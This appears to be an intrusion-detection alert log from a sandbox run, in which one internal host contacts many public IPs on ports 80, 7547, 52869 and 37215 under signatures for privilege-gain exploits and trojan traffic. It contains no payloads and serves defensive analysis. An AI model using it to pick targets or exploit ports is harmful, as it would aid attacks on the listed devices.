            Source Port:57334
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2337.150.232.8151152802846457 10/23/22-17:57:08.354913
            SID:2846457
            Source Port:51152
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.153.66.5741406802846380 10/23/22-17:58:06.719457
            SID:2846380
            Source Port:41406
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.2.203.4653962802846457 10/23/22-17:56:55.121791
            SID:2846457
            Source Port:53962
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.189.135.5452776802846380 10/23/22-17:57:29.512407
            SID:2846380
            Source Port:52776
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.248.63.18754830802846457 10/23/22-17:57:43.531129
            SID:2846457
            Source Port:54830
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.241.118.18549524802841623 10/23/22-17:57:46.808203
            SID:2841623
            Source Port:49524
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2337.1.222.7946536802846457 10/23/22-17:57:07.095976
            SID:2846457
            Source Port:46536
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23168.181.187.25454136802835221 10/23/22-17:57:16.449081
            SID:2835221
            Source Port:54136
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.83.38.16835688802027121 10/23/22-17:58:36.268889
            SID:2027121
            Source Port:35688
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.100.115.22055196802027121 10/23/22-17:57:33.458382
            SID:2027121
            Source Port:55196
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2361.110.198.2150616802846457 10/23/22-17:57:02.954510
            SID:2846457
            Source Port:50616
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.220.159.1247024802027121 10/23/22-17:57:10.375827
            SID:2027121
            Source Port:47024
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23206.2.139.23659032802846380 10/23/22-17:57:55.415092
            SID:2846380
            Source Port:59032
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.242.205.11451852802846457 10/23/22-17:58:05.462895
            SID:2846457
            Source Port:51852
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.198.105.10752334802027121 10/23/22-17:56:51.035370
            SID:2027121
            Source Port:52334
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23181.198.64.13755770802846380 10/23/22-17:56:55.834421
            SID:2846380
            Source Port:55770
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.65.83.18654456802027121 10/23/22-17:57:21.048077
            SID:2027121
            Source Port:54456
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2378.129.173.4137622802846457 10/23/22-17:58:04.238204
            SID:2846457
            Source Port:37622
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2352.51.101.18956142802841623 10/23/22-17:57:11.020124
            SID:2841623
            Source Port:56142
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.99.164.352868802027121 10/23/22-17:57:21.050541
            SID:2027121
            Source Port:52868
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.114.22.1257820802846457 10/23/22-17:58:26.453208
            SID:2846457
            Source Port:57820
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.19.3.21242120802027121 10/23/22-17:56:46.365118
            SID:2027121
            Source Port:42120
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.11.154.20660152802846380 10/23/22-17:58:22.232116
            SID:2846380
            Source Port:60152
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.189.168.2338262802846457 10/23/22-17:57:46.216121
            SID:2846457
            Source Port:38262
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.213.87.3451162802027121 10/23/22-17:57:52.153428
            SID:2027121
            Source Port:51162
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.43.27.10837120802846380 10/23/22-17:57:03.881859
            SID:2846380
            Source Port:37120
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.106.24.19239220802846380 10/23/22-17:56:47.013902
            SID:2846380
            Source Port:39220
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.100.85.19533698802027121 10/23/22-17:57:57.655163
            SID:2027121
            Source Port:33698
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.98.245.1650152802846380 10/23/22-17:57:10.839547
            SID:2846380
            Source Port:50152
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.25.223.21946600802846457 10/23/22-17:57:43.767560
            SID:2846457
            Source Port:46600
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2378.47.101.738316802841623 10/23/22-17:58:25.556348
            SID:2841623
            Source Port:38316
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.32.150.6839950802846380 10/23/22-17:56:55.332041
            SID:2846380
            Source Port:39950
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.110.56.6260036802846380 10/23/22-17:58:17.045499
            SID:2846380
            Source Port:60036
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.216.212.9041186802027121 10/23/22-17:57:12.983209
            SID:2027121
            Source Port:41186
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.210.101.14647222802027121 10/23/22-17:58:02.447409
            SID:2027121
            Source Port:47222
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.179.164.22051574802027121 10/23/22-17:56:53.247965
            SID:2027121
            Source Port:51574
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23169.62.56.11454474802846380 10/23/22-17:56:58.238376
            SID:2846380
            Source Port:54474
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.250.168.4255516802846380 10/23/22-17:57:09.467309
            SID:2846380
            Source Port:55516
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.196.14.22152520802846457 10/23/22-17:57:46.216045
            SID:2846457
            Source Port:52520
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2379.143.177.11741010802841623 10/23/22-17:57:01.100624
            SID:2841623
            Source Port:41010
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.116.201.16556410802846457 10/23/22-17:57:26.392157
            SID:2846457
            Source Port:56410
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.0.234.3537934802027121 10/23/22-17:57:57.716202
            SID:2027121
            Source Port:37934
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.94.201.7142222802846380 10/23/22-17:57:18.646359
            SID:2846380
            Source Port:42222
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.56.225.17739400802027121 10/23/22-17:57:25.955765
            SID:2027121
            Source Port:39400
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23156.232.160.14242154802841623 10/23/22-17:58:03.912064
            SID:2841623
            Source Port:42154
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.182.23551106802027121 10/23/22-17:58:32.660992
            SID:2027121
            Source Port:51106
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.215.177.14245136802027121 10/23/22-17:58:15.265611
            SID:2027121
            Source Port:45136
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.228.41.14559924802846457 10/23/22-17:58:26.402621
            SID:2846457
            Source Port:59924
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.60.19256346802027121 10/23/22-17:58:10.564137
            SID:2027121
            Source Port:56346
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2335.76.110.7749512802835221 10/23/22-17:57:43.028125
            SID:2835221
            Source Port:49512
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23176.31.131.5048328802835221 10/23/22-17:57:42.978234
            SID:2835221
            Source Port:48328
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.23.178.7735356802846457 10/23/22-17:57:03.750109
            SID:2846457
            Source Port:35356
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.237.29.8151658528692027339 10/23/22-17:58:36.025892
            SID:2027339
            Source Port:51658
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.114.128.13644374802846380 10/23/22-17:56:49.724019
            SID:2846380
            Source Port:44374
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23164.155.207.1733602528692027339 10/23/22-17:58:36.207886
            SID:2027339
            Source Port:33602
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.59.179.11236332802027121 10/23/22-17:58:07.461025
            SID:2027121
            Source Port:36332
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.252.157.17443302802846457 10/23/22-17:58:10.307732
            SID:2846457
            Source Port:43302
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.216.25.2137636802027121 10/23/22-17:58:15.276581
            SID:2027121
            Source Port:37636
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2361.220.207.23139504802846457 10/23/22-17:57:31.808963
            SID:2846457
            Source Port:39504
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.94.147.21537666802846380 10/23/22-17:57:51.816472
            SID:2846380
            Source Port:37666
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.123.231.14047156802846457 10/23/22-17:56:43.217353
            SID:2846457
            Source Port:47156
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2386.10.33.12149246802846380 10/23/22-17:57:33.283670
            SID:2846380
            Source Port:49246
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.251.20.5552836802846457 10/23/22-17:57:07.112689
            SID:2846457
            Source Port:52836
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.240.40.25156694802841623 10/23/22-17:58:37.551895
            SID:2841623
            Source Port:56694
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.211.100.2560994802846457 10/23/22-17:58:30.765652
            SID:2846457
            Source Port:60994
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.100.18.4933506802846380 10/23/22-17:57:07.294407
            SID:2846380
            Source Port:33506
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.10.2860992802027121 10/23/22-17:56:39.208604
            SID:2027121
            Source Port:60992
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23195.55.52.5135300802841623 10/23/22-17:58:35.884313
            SID:2841623
            Source Port:35300
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2384.118.219.7837654802846457 10/23/22-17:56:43.288482
            SID:2846457
            Source Port:37654
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.32.17.15748436802846380 10/23/22-17:56:49.720400
            SID:2846380
            Source Port:48436
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2337.150.237.12854910802846457 10/23/22-17:56:51.926567
            SID:2846457
            Source Port:54910
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.55.233.22439874802027121 10/23/22-17:57:54.655648
            SID:2027121
            Source Port:39874
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.77.251.737246802027121 10/23/22-17:58:02.129377
            SID:2027121
            Source Port:37246
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2382.196.15.18440920802846380 10/23/22-17:58:04.014303
            SID:2846380
            Source Port:40920
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.61.47.20360720802846380 10/23/22-17:57:14.220148
            SID:2846380
            Source Port:60720
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2383.166.146.20951662802846380 10/23/22-17:57:22.143981
            SID:2846380
            Source Port:51662
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.32.122.12946140802846457 10/23/22-17:56:43.219777
            SID:2846457
            Source Port:46140
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2376.8.104.8342736802841623 10/23/22-17:58:11.415337
            SID:2841623
            Source Port:42736
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.214.64.10940076802846457 10/23/22-17:57:16.979849
            SID:2846457
            Source Port:40076
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.17.94.13135892802846457 10/23/22-17:57:28.759198
            SID:2846457
            Source Port:35892
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.177.110.24940790802846380 10/23/22-17:57:48.710725
            SID:2846380
            Source Port:40790
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.99.14.5255250802027121 10/23/22-17:58:19.560079
            SID:2027121
            Source Port:55250
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.208.61.11841710802846380 10/23/22-17:58:22.247873
            SID:2846380
            Source Port:41710
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.232.165.1074168875472835222 10/23/22-17:58:21.213326
            SID:2835222
            Source Port:41688
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23156.244.32.16440912802841623 10/23/22-17:58:25.695789
            SID:2841623
            Source Port:40912
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.2.88.8552354802846457 10/23/22-17:57:02.927723
            SID:2846457
            Source Port:52354
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.116.147.14157218802027121 10/23/22-17:56:54.889745
            SID:2027121
            Source Port:57218
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23164.46.58.17147272802846457 10/23/22-17:57:22.797573
            SID:2846457
            Source Port:47272
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.102.13.10236816802846380 10/23/22-17:58:06.181287
            SID:2846380
            Source Port:36816
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.161.195.9949878802846457 10/23/22-17:57:38.016792
            SID:2846457
            Source Port:49878
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.99.113.9154952802027121 10/23/22-17:57:47.238141
            SID:2027121
            Source Port:54952
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.195.140.20635646802846457 10/23/22-17:57:00.397651
            SID:2846457
            Source Port:35646
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2349.12.56.7033412802841623 10/23/22-17:57:28.381541
            SID:2841623
            Source Port:33412
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.175.10.19835010802027121 10/23/22-17:58:25.691640
            SID:2027121
            Source Port:35010
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2354.246.138.24149212802835221 10/23/22-17:57:01.124424
            SID:2835221
            Source Port:49212
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.147.135.11252966802027121 10/23/22-17:57:59.913056
            SID:2027121
            Source Port:52966
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2386.189.206.344114275472023548 10/23/22-17:58:01.539645
            SID:2023548
            Source Port:41142
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.116.239.15456274802027121 10/23/22-17:56:51.027716
            SID:2027121
            Source Port:56274
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.205.105.23042748802846380 10/23/22-17:57:09.510951
            SID:2846380
            Source Port:42748
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.209.205.15544816802027121 10/23/22-17:57:25.764452
            SID:2027121
            Source Port:44816
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.216.231.12838162802027121 10/23/22-17:58:07.287651
            SID:2027121
            Source Port:38162
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.248.147.16737714802846380 10/23/22-17:56:47.038896
            SID:2846380
            Source Port:37714
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2369.161.149.20935726802835222 10/23/22-17:58:21.288857
            SID:2835222
            Source Port:35726
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.130.113.11139804802846457 10/23/22-17:58:15.493956
            SID:2846457
            Source Port:39804
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.229.106.15140178802846380 10/23/22-17:56:42.732531
            SID:2846380
            Source Port:40178
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.229.211.22939640802835221 10/23/22-17:57:28.747625
            SID:2835221
            Source Port:39640
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.252.137.2243862802846380 10/23/22-17:58:25.099678
            SID:2846380
            Source Port:43862
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.129.250.1842282802027121 10/23/22-17:56:48.880433
            SID:2027121
            Source Port:42282
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.150.190.25254436802846457 10/23/22-17:57:32.436895
            SID:2846457
            Source Port:54436
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.66.210.18059592802846457 10/23/22-17:58:21.688404
            SID:2846457
            Source Port:59592
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23197.25.143.23243680802841623 10/23/22-17:57:01.386185
            SID:2841623
            Source Port:43680
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2383.136.2.23745490802846380 10/23/22-17:57:15.823067
            SID:2846380
            Source Port:45490
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.56.81.2141436802027121 10/23/22-17:57:10.506857
            SID:2027121
            Source Port:41436
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.90.62.13958766802846380 10/23/22-17:58:25.058870
            SID:2846380
            Source Port:58766
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.57.98.13559810802846380 10/23/22-17:56:47.476510
            SID:2846380
            Source Port:59810
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.174.148.16147054802846380 10/23/22-17:58:22.686788
            SID:2846380
            Source Port:47054
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.163.225.14736418802846457 10/23/22-17:57:38.008988
            SID:2846457
            Source Port:36418
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2373.81.42.10756262802841623 10/23/22-17:57:07.567330
            SID:2841623
            Source Port:56262
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.249.39.3548116802027121 10/23/22-17:56:55.724106
            SID:2027121
            Source Port:48116
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2378.138.108.3835180802846457 10/23/22-17:57:47.779270
            SID:2846457
            Source Port:35180
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.189.155.18238420802846457 10/23/22-17:58:39.952224
            SID:2846457
            Source Port:38420
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.128.155.14947928802846457 10/23/22-17:57:58.561807
            SID:2846457
            Source Port:47928
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.183.37.8950146802027121 10/23/22-17:57:21.058132
            SID:2027121
            Source Port:50146
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.237.54.9639018802846457 10/23/22-17:58:26.432249
            SID:2846457
            Source Port:39018
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.208.205.13840348802027121 10/23/22-17:58:35.005809
            SID:2027121
            Source Port:40348
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.143.29.5842854802846380 10/23/22-17:58:13.493328
            SID:2846380
            Source Port:42854
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23185.168.174.24038086802841623 10/23/22-17:58:11.394085
            SID:2841623
            Source Port:38086
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.213.12.10237264802835221 10/23/22-17:58:14.113045
            SID:2835221
            Source Port:37264
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.179.150.11842026802027121 10/23/22-17:56:48.741536
            SID:2027121
            Source Port:42026
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.128.178.3145572802846380 10/23/22-17:58:27.560480
            SID:2846380
            Source Port:45572
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.27.227.12840530802027121 10/23/22-17:57:28.487376
            SID:2027121
            Source Port:40530
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.235.23.51.10434274802846457 10/23/22-17:57:53.331368
            SID:2846457
            Source Port:34274
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2386.95.220.19935952802846380 10/23/22-17:57:01.321400
            SID:2846380
            Source Port:35952
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2383.96.110.19341652802846380 10/23/22-17:57:15.955988
            SID:2846380
            Source Port:41652
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.180.104.11033960802846457 10/23/22-17:57:35.654459
            SID:2846457
            Source Port:33960
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2376.143.163.6552016802841623 10/23/22-17:57:12.577016
            SID:2841623
            Source Port:52016
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.245.197.13947800802846457 10/23/22-17:57:58.553666
            SID:2846457
            Source Port:47800
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.241.118.18548652802841623 10/23/22-17:57:35.661549
            SID:2841623
            Source Port:48652
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2384.38.185.14360264802846457 10/23/22-17:57:46.329699
            SID:2846457
            Source Port:60264
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.214.25.17840000802846457 10/23/22-17:56:48.675092
            SID:2846457
            Source Port:40000
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.99.211.2741924802027121 10/23/22-17:57:05.124779
            SID:2027121
            Source Port:41924
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.31.35.4049782802027121 10/23/22-17:57:18.864521
            SID:2027121
            Source Port:49782
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.253.97.13150314802027121 10/23/22-17:58:37.493609
            SID:2027121
            Source Port:50314
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2336.37.70.19260244372152835222 10/23/22-17:57:58.315251
            SID:2835222
            Source Port:60244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2337.26.115.9636372802846457 10/23/22-17:56:51.848251
            SID:2846457
            Source Port:36372
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.196.28.9833874802846457 10/23/22-17:57:35.591913
            SID:2846457
            Source Port:33874
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.221.21.6460606802846380 10/23/22-17:58:36.892932
            SID:2846380
            Source Port:60606
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.121.165.22941020802027121 10/23/22-17:58:29.892726
            SID:2027121
            Source Port:41020
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.243.76.4733370802846457 10/23/22-17:58:24.014248
            SID:2846457
            Source Port:33370
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.32.69.5654438802846380 10/23/22-17:56:41.505964
            SID:2846380
            Source Port:54438
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.17.52.21746952802846457 10/23/22-17:57:07.304161
            SID:2846457
            Source Port:46952
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.161.125.25347892802846457 10/23/22-17:57:35.757469
            SID:2846457
            Source Port:47892
            Destination Port:80
            Protocol:TCP
